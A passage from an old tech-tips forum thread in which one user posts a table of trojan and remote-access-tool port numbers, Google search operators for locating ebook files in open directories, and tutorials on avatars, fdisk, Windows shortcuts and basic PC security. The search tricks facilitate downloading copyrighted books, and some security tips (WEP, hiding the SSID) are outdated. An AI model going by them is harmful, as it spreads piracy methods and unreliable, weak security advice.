    TCP 31887 BDDT.100
    TCP 31889 BDDT.100
    TCP 32100 ProjectNext.053
    TCP 32418 AcidBattery.100
    TCP 32791 Akropolis.100, Rocks.100
    TCP 33291 RemoteHak.001
    TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
    TCP 33577 SonOfPsychward.020
    TCP 34324 TelnetServer.100
    TCP 34763 Infector.180, Infector.190, Infector.200
    TCP 35000 Infector.190, Infector.200
    TCP 35600 Subsari.140
    TCP 36794 BugBear.100
    TCP 37237 Mantis.020
    TCP 37651 YAT.210
    TCP 37653 YAT.310
    TCP 40308 Subsari.140
    TCP 40412 TheSpy.100
    TCP 40421 MastersParadise.970
    TCP 40422 MastersParadise.970
    TCP 40999 DiemsMutter.110, DiemsMutter.140
    TCP 41626 Shah.100
    TCP 44444 Prosiak.070
    TCP 45673 Akropolis.100, Rocks.100
    TCP 47262 Delta.050
    TCP 48006 Fragglerock.200
    TCP 49683 HolzPferd.210
    TCP 50000 Infector.180
    TCP 50130 Enterprise.100
    TCP 50766 Fore.100
    TCP 51234 Cyn.210
    TCP 51966 Cafeini.080, Cafeini.110
    TCP 54321 PCInvader.010
    TCP 57341 NetRaider.100
    TCP 57922 Bionet.084
    TCP 58008 Tron.100
    TCP 58009 Tron.100
    TCP 59090 AcidReign.200
    TCP 59211 DuckToy.100, DuckToy.101
    TCP 59345 NewFuture.100
    TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
    TCP 60411 Connection.100, Connection.130
    TCP 60412 Connection.130
    TCP 60552 RoxRat.100
    TCP 63536 InsaneNetwork.500
    TCP 63878 AphexFTP.100
    TCP 63879 AphexFTP.100
    TCP 64969 Lithium.100
    TCP 65000 Socket.100
    UDP 1 SocketsDeTroie.250
    UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
    UDP 1130 Noknok.800, Noknok.820
    UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
    UDP 2989 Rat.200
    UDP 3128 MastersParadise.970
    UDP 3129 MastersParadise.920, MastersParadise.970
    UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
    UDP 3333 Daodan.123
    UDP 3800 Eclypse.100
    UDP 3996 RemoteAnything.364
    UDP 4000 RemoteAnything.364
    UDP 5555 Daodan.123
    UDP 5881 Y3KRat.110, Y3KRat.140
    UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
    UDP 5883 Y3KRat.110, Y3KRat.140
    UDP 5884 Y3KRat.140, Y3KRat.150
    UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
    UDP 5886 Y3KRat.120, Y3KRat.140
    UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
    UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
    UDP 6953 Lithium.100
    UDP 8012 Ptakks.217
    UDP 10067 PortalOfDoom.100
    UDP 10167 PortalOfDoom.100
    UDP 10666 Ambush.100
    UDP 11225 Cyn.100, Cyn.103, Cyn.120
    UDP 11306 Noknok.800, Noknok.820
    UDP 12389 KheSanh.210
    UDP 12623 Buttman.090, Buttman.100
    UDP 12625 Buttman.100
    UDP 14100 Eurosol.100
    UDP 23476 DonaldDick.155
    UDP 26274 Delta.050
    UDP 27184 Alvgus.100
    UDP 28431 Hack'a'Tack.2000
    UDP 28432 Hack'a'Tack.2000
    UDP 28433 Hack'a'Tack.2000
    UDP 28434 Hack'a'Tack.2000
    UDP 28435 Hack'a'Tack.2000
    UDP 28436 Hack'a'Tack.2000
    UDP 29891 Unexplained.100
    UDP 30103 NetSphere.131
    UDP 31320 LittleWitch.400, LittleWitch.420
    UDP 31337 BackOrifice.120, OPC.200
    UDP 31416 Lithium.100, Lithium.101
    UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
    UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
    UDP 33333 Blackharaz.100
    UDP 47262 Delta.050
    UDP 49683 HolzPferd.210
    UDP 60000 MiniBacklash.100
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Using Google for searching ebooks

    Google has some fantastic potential for you to find whatever you are after on the internet.

    To search for a book / program / file perhaps try the following.

    Go to Google's search page and use the following criteria in the search dialog

    intitle:index.of? file extension Name of item

    e.g. intitle:index.of? chm syngress

    This will hopefully give you a listing of all websites that google has cached that contain references to files in CHM format that are published by SYNGRESS.

    ---------------
    I use in Google

    +("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +syngress

    or

    allinurl: +(rar|chm|zip|pdf|tgz) Syngress
    Enjoy
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Video Avatars

    Video Avatars


    1. Open PowerDVD:

    2. Open a movie or Video clip:

    3. Go to the beginning of the part u want as avatar & click on pause

    4. make a picture of it:

    5. press 2 steps forward & then make another pic, do this until u got the whole part:



    Video Avatars


    1. Open PowerDVD:
    user posted image

    2. Open a movie or Video clip:
    user posted image
    user posted image

    3. Go to the beginning of the part u want as avatar & click on pause
    user posted image

    4. make a picture of it:
    user posted image

    5. press 2 steps forward & then make another pic, do this until u got the whole part:
    user posted image

    6. go to imageready 7 & then select "file", "import" & then "folder as frames..." & then u select the folder wit your pics made wit powerDVD:

    7. put the layers in place & save it optimized as GIF
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Partitioning Your Harddisk With Fdisk
    Partitioning your HardDisk

    Partitioning involves creating logical units on your hard drive that are then addressed as different drive letters. Not only does it help to organize your data (program files on one drive, games on another, documents on another) but also to speed up your PC. This is so because the drive head has to move a lesser distance for accessing data within one partition. You can also have different filesystems and OSs on the same hard drive.

    Partitioning can be done using ‘fdisk’ in DOS/Windows 9x or ‘disk management’ in Windows 2000/ NT/XP. We will describe the procedure for fdisk, since disk management is GUI driven and the basics otherwise remain the same. While several other commercial packages like Partition Magic are available, these utilities (fdisk, computer management) are bundled with their respective OSs. You need a bootable floppy with fdisk.exe, format.com, and sys. com utilities. Before starting, decide how many partitions you want to create and their sizes. You can create one primary and one extended partition using the DOS fdisk. The extended partition can then have multiple logical partitions. Boot your machine using the bootable disk, and do the following.

    Run fdisk. The utility will show you a numbered menu from where you can create, view, or delete partitions
    The utility first asks you whether you want to enable large disk support. Type Y (for yes) and press enter if your hard-drive capacity is more than 4 GB. Large disk support creates a FAT32 partition, which can be greater than 2 GB
    Select the first option from fdisk menu to create a primary partition. Specify the partition size in megabytes or percentage size when prompted for it
    Similarly, create an extended partition. Extended partitions by themselves do not appear as drive letters. Instead, logical partitions must be created in them, which are then assigned drive letters
    Exit fdisk and reboot the computer
    Fdisk automatically assigns drive letters to all the partitions. You’ll need to format each partition in order to use it. Use format.com for the same
    Your hard drive is now ready for taking an OS.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    For Real Windows Newbie's here you go...

    CTRL+C (Copy)
    CTRL+X (Cut)
    CTRL+V (Paste)
    CTRL+Z (Undo)
    DELETE (Delete)
    SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
    CTRL while dragging an item (Copy the selected item)
    CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
    F2 key (Rename the selected item)
    CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
    CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
    CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
    CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
    CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
    SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
    CTRL+A (Select all)
    F3 key (Search for a file or a folder)
    ALT+ENTER (View the properties for the selected item)
    ALT+F4 (Close the active item, or quit the active program)
    ALT+ENTER (Display the properties of the selected object)
    ALT+SPACEBAR (Open the shortcut menu for the active window)
    CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
    ALT+TAB (Switch between the open items)
    ALT+ESC (Cycle through items in the order that they had been opened)
    F6 key (Cycle through the screen elements in a window or on the desktop)
    F4 key (Display the Address bar list in My Computer or Windows Explorer)
    SHIFT+F10 (Display the shortcut menu for the selected item)
    ALT+SPACEBAR (Display the System menu for the active window)
    CTRL+ESC (Display the Start menu)
    ALT+Underlined letter in a menu name (Display the corresponding menu)
    Underlined letter in a command name on an open menu (Perform the corresponding command)
    F10 key (Activate the menu bar in the active program)
    RIGHT ARROW (Open the next menu to the right, or open a submenu)
    LEFT ARROW (Open the next menu to the left, or close a submenu)
    F5 key (Update the active window)
    BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
    ESC (Cancel the current task)
    SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
    Dialog Box Keyboard Shortcuts
    CTRL+TAB (Move forward through the tabs)
    CTRL+SHIFT+TAB (Move backward through the tabs)
    TAB (Move forward through the options)
    SHIFT+TAB (Move backward through the options)
    ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
    ENTER (Perform the command for the active option or button)
    SPACEBAR (Select or clear the check box if the active option is a check box)
    Arrow keys (Select a button if the active option is a group of option buttons)
    F1 key (Display Help)
    F4 key (Display the items in the active list)
    BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
    Microsoft Natural Keyboard Shortcuts
    Windows Logo (Display or hide the Start menu)
    Windows Logo+BREAK (Display the System Properties dialog box)
    Windows Logo+D (Display the desktop)
    Windows Logo+M (Minimize all of the windows)
    Windows Logo+SHIFT+M (Restore the minimized windows)
    Windows Logo+E (Open My Computer)
    Windows Logo+F (Search for a file or a folder)
    CTRL+Windows Logo+F (Search for computers)
    Windows Logo+F1 (Display Windows Help)
    Windows Logo+ L (Lock the keyboard)
    Windows Logo+R (Open the Run dialog box)
    Windows Logo+U (Open Utility Manager)
    Accessibility Keyboard Shortcuts
    Right SHIFT for eight seconds (Switch FilterKeys either on or off)
    Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
    Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
    SHIFT five times (Switch the StickyKeys either on or off)
    NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
    Windows Logo +U (Open Utility Manager)
    Windows Explorer Keyboard Shortcuts
    END (Display the bottom of the active window)
    HOME (Display the top of the active window)
    NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
    NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
    NUM LOCK+Minus sign (-) (Collapse the selected folder)
    LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
    RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
    Shortcut Keys for Character Map
    After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
    RIGHT ARROW (Move to the right or to the beginning of the next line)
    LEFT ARROW (Move to the left or to the end of the previous line)
    UP ARROW (Move up one row)
    DOWN ARROW (Move down one row)
    PAGE UP (Move up one screen at a time)
    PAGE DOWN (Move down one screen at a time)
    HOME (Move to the beginning of the line)
    END (Move to the end of the line)
    CTRL+HOME (Move to the first character)
    CTRL+END (Move to the last character)
    SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
    Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
    CTRL+O (Open a saved console)
    CTRL+N (Open a new console)
    CTRL+S (Save the open console)
    CTRL+M (Add or remove a console item)
    CTRL+W (Open a new window)
    F5 key (Update the content of all console windows)
    ALT+SPACEBAR (Display the MMC window menu)
    ALT+F4 (Close the console)
    ALT+A (Display the Action menu)
    ALT+V (Display the View menu)
    ALT+F (Display the File menu)
    ALT+O (Display the Favorites menu)
    MMC Console Window Keyboard Shortcuts
    CTRL+P (Print the current page or active pane)
    ALT+Minus sign (-) (Display the window menu for the active console window)
    SHIFT+F10 (Display the Action shortcut menu for the selected item)
    F1 key (Open the Help topic, if any, for the selected item)
    F5 key (Update the content of all console windows)
    CTRL+F10 (Maximize the active console window)
    CTRL+F5 (Restore the active console window)
    ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
    F2 key (Rename the selected item)
    CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
    Remote Desktop Connection Navigation
    CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
    ALT+PAGE UP (Switch between programs from left to right)
    ALT+PAGE DOWN (Switch between programs from right to left)
    ALT+INSERT (Cycle through the programs in most recently used order)
    ALT+HOME (Display the Start menu)
    CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
    ALT+DELETE (Display the Windows menu)
    CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
    CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
    Microsoft Internet Explorer Navigation
    CTRL+B (Open the Organize Favorites dialog box)
    CTRL+E (Open the Search bar)
    CTRL+F (Start the Find utility)
    CTRL+H (Open the History bar)
    CTRL+I (Open the Favorites bar)
    CTRL+L (Open the Open dialog box)
    CTRL+N (Start another instance of the browser with the same Web address)
    CTRL+O (Open the Open dialog box, the same as CTRL+L)
    CTRL+P (Open the Print dialog box)
    CTRL+R (Update the current Web page)
    CTRL+W (Close the current window)
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    10 Fast and Free Security Enhancements
    PC magazine.

    Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

    1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

    2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.


    3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

    4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

    5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

    6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

    7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

    8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

    9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

    10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."